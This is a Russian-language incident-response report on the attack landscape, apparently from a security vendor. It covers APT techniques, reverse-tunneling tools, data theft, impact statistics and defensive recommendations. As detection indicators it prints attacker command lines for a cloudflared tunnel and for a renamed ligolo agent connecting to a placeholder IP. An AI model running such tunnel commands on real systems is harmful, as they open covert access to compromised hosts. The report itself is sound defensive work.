Злоумышленники используют как специализированные средства для управления узлами, перечисленные выше, так и не предназначенные для этого напрямую инструменты, например Google Sheets API. В частности, к Google Sheets API обращалась полезная нагрузка ВПО APT-группировки CloudAtlas: в столбец А записывалось время, УЗ и имя скомпрометированного хоста, а из столбца B, если он был непустым, считывалась зашифрованная команда. Далее применялся PowerShell-загрузчик, который загружал закодированные XML. Для загрузки и исполнения модулей использовалась техника DLL Sideloading (внедрение вредоносной DLL в процесс CiscoCollabHost.exe). В итоге внедрялся Cloud Atlas backdoor, работающий в оперативной памяти скомпрометированного узла и загружающий с «Яндекс Диска» вредоносные модули для кибершпионажа и кражи конфиденциальной информации.
Для организации доступа из интернета к скомпрометированным внутренним узлам киберпреступники настраивают обратные туннели, обходя NAT и межсетевые экраны и создавая удобный канал взаимодействия с управляющим сервером. Своевременное обнаружение туннелирования имеет критически важное значение, так как туннелирование трафика предоставляет злоумышленникам скрытый канал доступа к ранее скомпрометированному узлу, зачастую не видимый СЗИ. Раннее выявление сокращает потенциальные потери — например, минимизирует объем утечки данных, количество зашифрованных узлов и увеличивает шанс собрать необходимые для расследования журналы до того, как часть из них ротируется.
Как показывают результаты работы наших IR-специалистов, самым популярным набором инструментов для туннелирования трафика по-прежнему остается gsocket (20%), включая его вариацию — qsocket. Почетное второе место, как и в прошлом году, занимает общедоступный инструмент Ngrok (17%). Ранее мы уже делились способами поиска gsocket и Ngrok.
А вот так может выглядеть событие успешного входа с использованием сетевого туннеля (обратите внимание на имя узла, с которого происходит подключение, тут оно дополнительно бросается в глаза, но нередко для выявления туннеля достаточно сравнить IP-адрес узла-источника с его известным FQDN: если в событии присутствует другое имя узла в поле WorkStationName — это повод задуматься):
| Где смотреть: | C:\Windows\System32\winevt\Logs\Security.evtx | |
| Что смотреть: | Provider | Microsoft-Windows-Security-Auditing |
| EventID | 4624 | |
| Ключевая информация | ... "IpAddress": "[IP]", ... "TargetDomainName": "[DOMAIN]", ... "TargetUserName": "[USER]", "TargetUserSid": "[SID]", ... "WorkstationName": "kali" ... | |
Помимо описанных gsocket и Ngrok, в пятерку наиболее популярных инструментов для туннелирования трафика входят LocalToNet (выявлен в 15% случаев), PuTTY (12%) и Chisel (12%). Полный список инструментов для туннелирования трафика, выявленных в ходе работ на проектах, представлен в таблице 5.
Часто злоумышленники создают несколько туннелей, используя разные инструменты, чтобы сохранить доступ при обнаружении и закрытии одного из каналов доступа.
Пример использования общедоступной утилиты Cloudflare Argo Tunnel:
| Где смотреть: | C:\Windows\System32\winevt\Logs\System.evtx | |
| Что смотреть: | Provider | Service Control Manager |
| EventID | 7045 | |
| Ключевая информация | ... "ImagePath": "c:\\windows\\system32\\cloudflared.exe tunnel run --token [TOKEN]" ... | |
Пример использования общедоступной утилиты ligolo:
| Где смотреть: | /proc/[PID]/cmdline |
| Что смотреть: | ./Postgre -connect [IP]:443 -retry -ignore-cert |
В контексте сбора данных злоумышленников интересуют выгрузки из БД, создание их резервных копий (HeidiSQL, pgdump, pgAdmin, SQL Plus), побайтовое копирование данных с дисков (RawCopy), копирование заблокированных на «живой» системе файлов (ShadowSpawn) потенциально в целях извлечения аутентификационных данных, а также извлечение данных из резервных копий Veeam (Veeam Backup Extract).
Кроме того, мы продолжаем фиксировать случаи получения злоумышленниками содержимого директории tdata, что позволяет заходить в аккаунт Telegram. Более подробно с темой можно ознакомиться в нашем Telegram-канале, а c конкретными рекомендациями — в нашем блоге на Хабре.
По итогам анализа сетевых индикаторов мы собрали статистику по наиболее используемым ASN и их географии и составили топ VPN-сервисов, применяемых злоумышленниками (рисунок 17). К числу наиболее часто встречающихся ASN относятся AS15440 UAB Baltnetos komunikacijos и AS9009 M247 Europe SRL, а в топ VPN-сервисов вошли Mullvad и Proton VPN.
Высокая доля российских IP в выборке ниже по-прежнему обусловлена тем, что многие организации блокируют заграничные IP и атакующие, как следствие, арендуют адреса в российских дата-центрах.
Основываясь на опыте последних расследований, мы выделили набор директорий, где чаще всего размещались инструменты злоумышленников.
Для устройств под управлением Linux это преимущественно директории, в которых обычно находятся и легитимные исполняемые файлы. Однако директории, перечисленные в нашем прошлом исследовании, также могут быть использованы злоумышленниками.
Для устройств под управлением Windows это преимущественно системные директории.
Для устройств под управлением Windows это преимущественно системные директории.
По сравнению с предыдущим отчетным периодом доля проектов, в которых инцидент привел к нарушению внутренних бизнес-процессов, увеличилась с 50% до 55%. Под нарушением бизнес-процессов мы понимаем невозможность работы в результате полного или частичного шифрования части инфраструктуры, недоступности критически значимого сервиса.
В ходе каждого четвертого проекта (25%) были выявлены следы выгрузки конфиденциальной информации.
Наиболее разрушительной атакой за наблюдаемый период стала операция группировки OldGremlin, которая сумела зашифровать большую часть географически распределенной инфраструктуры, парализовав работу заказчика на несколько рабочих дней. Так как зашифрованы были почти все хосты инфраструктуры, одним из основных источников информации выступили восстановленные с зашифрованных виртуальных дисков данные.
По мере продвижения по инфраструктуре в каждой пятой компании (21%) злоумышленники скомпрометировали как минимум один контроллер домена. Получив доступ к контроллеру домена, злоумышленники могут развивать атаку, например распространять вредоносное ПО на узлы при помощи глобальных политик Windows или получить аутентификационные данные для всех пользователей домена.
Кроме того, злоумышленников интересуют внутренние информационные системы — базы данных, внутренние порталы, справочные системы. Доля компрометации таких систем составила 19%.
На этапе продвижения по сети атакующих также интересуют серверы централизованного управления СЗИ (11%). Они обладают широкой видимостью сети, имеют привилегированные учетные записи и поэтому зачастую используются злоумышленниками, например для массового распространения и запуска шифровальщиков. В равной степени (11%) злоумышленников интересуют системы виртуализации, управляя которыми можно удалить имеющиеся виртуальные машины, а также почтовые серверы Microsoft Exchange.
Атакующие активно скрывают следы, а часть артефактов может быть утрачена из-за ротации логов или перезагрузки узлов. Поэтому не всегда удается точно назвать число затронутых систем. В среднем в половине случаев (55%) компрометация охватывает менее десяти узлов и менее пяти учетных записей. Однако при взломе контроллера домена или УЗ администратора домена под угрозой оказываются все соответствующие пользователи.
Как и прежде, чаще всего злоумышленники атаковали узлы под управлением Windows. Мы также видим, что в достаточно большой части атак злоумышленникам приходилось работать в гибридных инфраструктурах, в которых есть как узлы под управлением Windows, так и узлы под управлением различных ОС семейства Linux.
Кроме того, мы отмечаем увеличение случаев компрометации ОС сетевого оборудования, в частности Cisco IOS. В одном из случаев исходным вектором проникновения в компанию послужили сетевые устройства Juniper (включая эксплуатацию CVE-2023-36845), после чего злоумышленники продвинулись по сегментам сети, скомпрометировав серверы «1C» и VMWare ESXi.
За прошедший отчетный период мы отмечаем рост числа запросов на исследование мобильных устройств. Наиболее популярными были запросы на исследование образцов банковских троянов на Android, распространяемых в Telegram в виде файлов CBO-Information.apk, Видео.apk, Фото.apk. Было установлено, что файлы относятся к ВПО, детектируемому как Mamont.
Почти в каждом четвертом проекте (26%) мы наблюдали недостаточную сегментацию сети инфраструктуры заказчика. К наиболее частым причинам инцидентов мы также относим использование устаревших версий ОС и ПО, в частности на узлах сетевого периметра, и отсутствие выстроенного процесса их обновления (25%).
В 23% проектов успеху атакующих способствовало отсутствие двухфакторной аутентификации на узлах. Важно отметить, что в некоторых случаях двухфакторная аутентификация могла бы усложнить атаку через организацию подрядчика и увеличить вероятность обнаружения атаки на ранних этапах.
В 21% случаев мы отмечали отсутствие или недостаточно эффективную настройку антивирусных СЗИ.
В нашем прошлом отчете мы уже делились рекомендациями по предотвращению и снижению количества инцидентов кибербезопасности. Как показывает практика, эти рекомендации продолжают оставаться актуальными.
Наш анализ актуальных угроз показывает ежегодный рост активности атак и, как следствие, увеличение числа проектов по расследованию и ретроспективному анализу. Практика демонстрирует: многие инциденты можно было предотвратить или остановить раньше, если бы были соблюдены базовые принципы кибербезопасности.
В первую очередь мы рекомендуем провести инвентаризацию инфраструктуры и IT-процессов и расставить приоритеты в соответствии с рисками — от локального инцидента до потери контроля над всей системой. Максимальное внимание следует уделять узлам с наибольшим потенциалом ущерба, например серверам с централизованными системами управления инфраструктурой, доменным контроллерам и иным критически значимым ресурсам. Для таких систем необходим усиленный контроль доступа, регулярное обновление, мониторинг и резервирование, так как их компрометация оказывает наибольшее влияние на организацию. Наши основные рекомендации:
Мы настоятельно советуем использовать современные средства и технологии защиты информации, которые доказали свою эффективность в борьбе с киберпреступниками. В их числе:
Чтобы быть в курсе актуальных киберугроз, знать о современных техниках и инструментах злоумышленников, рекомендуем изучать публикации экспертов PT ESC Incident Response, обращать внимание на посты других команд PT ESC в Telegram-канале ESCalator, а также читать наши регулярные аналитические отчеты, посвященные ландшафту киберугроз и трендовым уязвимостям. Эта информация поможет вам быть на шаг впереди киберпреступников и ускорить реагирование на инциденты.
